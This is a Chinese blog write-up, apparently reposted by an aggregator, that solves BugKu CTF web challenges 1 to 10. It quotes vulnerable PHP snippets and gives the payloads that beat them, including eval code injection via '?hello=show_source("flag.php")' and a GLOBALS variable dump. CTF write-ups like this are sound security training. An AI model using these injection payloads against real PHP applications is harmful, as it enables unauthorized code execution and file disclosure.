BugKu [CTF] [web1-10]

Posted 热绪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BugKu [CTF] [web1-10]相关的知识,希望对你有一定的参考价值。

1.web1

flag在F12里面

2.web2

题目对输入框长度进行了限制,只需要F12修改长度输入正确验证码验证即可。

3.web3

4.web4

5.web5,矛盾

$num=$_GET['num']; //get方式得到参数值
if(!is_numeric($num))
//is_numeric()函数用于检测变量是否为数字或数字字符串;这里判断num是不是数字,如果不是数字则输出num的值;
{
echo $num;
if($num==1)
echo 'flag{**********}';
//如果num=1,那么输出flag
}

 

构造num=1a绕过即可

6.web6

无休止的弹窗,禁用JS食用,F12查看源码发现,最后有Unicode编码的东西,并使用&#做了转义处理

我们进行解码:flag{6b8bc84e88a83d664e4e57f16cc0ccc0}

7.web7,你必须让它停下

有一个图片一直闪烁停不下来,理论上来说禁用JS查看源码即可,但是我这个火狐找不到FLAG,所以选择抓包。

8.web8,文件包含

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    //接收了传来的hello参数
    eval( "var_dump($a);");
    //var_dump显示结构信息,包括类型和值;eval函数把字符串按照PHP代码来计算。
    show_source(__FILE__);
    //高亮显示文件,返回文件内容
?>

构造payload:?hello=show_source("flag.php")

9.web9

<?php  
error_reporting(0);
//关闭错误提示
include "flag1.php";
//包含并允许flag1.php
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\\w+$/",$args)){
        //过滤正则:AZ,az,0~9,_ 中任意一个
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

flag in the variable: flag在变量中,所以我们构造payload:/flag1.php?args=GLOBALS

我们构造?args=GLOBALS

10.web10

显示什么也没有,还是在F12中找到了。

 

 

 

以上是关于BugKu [CTF] [web1-10]的主要内容,如果未能解决你的问题,请参考以下文章

CTF--web BugKu-ctf-web(1-10)

bugku_web_变量1(CTF)

CTF | bugku | 秋名山车神

BugKu [CTF] web11

Bugku_CTF Writeup 之 域名解析(50)

BugKu CTF(杂项篇MISC)---细心的大象